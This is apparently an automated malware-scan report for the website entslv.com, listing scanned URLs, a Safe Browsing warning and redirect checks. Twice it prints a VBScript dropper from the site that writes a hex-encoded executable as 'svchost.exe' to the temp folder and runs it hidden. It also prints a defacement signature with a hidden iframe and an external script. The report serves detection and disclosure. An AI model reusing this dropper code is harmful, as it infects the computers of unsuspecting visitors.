Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=entslv.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.entslv.com/ | 200 OK Content-Length: 270094 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103007928EB3B0000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E004000000400000100000000200000500000007000200040000000000000000900500 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Alsaskar_Attacker <html> <iframe width="0" height="0" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/167116893&auto_play=true&hide_related=false&visual=true"></iframe> <meta name="google-site-verification" content="Hacked By Alsaskar_Attacker"/> <meta http-equiv="Content-Language" content="en-us-id"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="author" content="Alsaskar_Attacker"> <meta name="robots schedule" content="auto"> <script src="http://masterendi.googlecode.com/fil ...[270201 bytes skipped]... | ||
http://masterendi.googlecode.com/files/salju.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://masterendi.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://masterendi.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js | 404 Not Found Content-Length: 1445 Content-Type: text/html | clean |
http://tuyulz-blogspot.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://yourjavascript.com/1171704334/efek-salju-faisal.js | 200 OK Content-Length: 9459 Content-Type: text/javascript | clean |
http://www.entslv.com//www.google.com/ | 200 OK Content-Length: 270094 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103007928EB3B0000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E004000000400000100000000200000500000007000200040000000000000000900500 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: entslv.com
Result:
GET / HTTP/1.1
Host: entslv.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: entslv.com
Referer: http://www.google.com/search?q=entslv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: entslv.com
Referer: http://www.google.com/search?q=entslv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.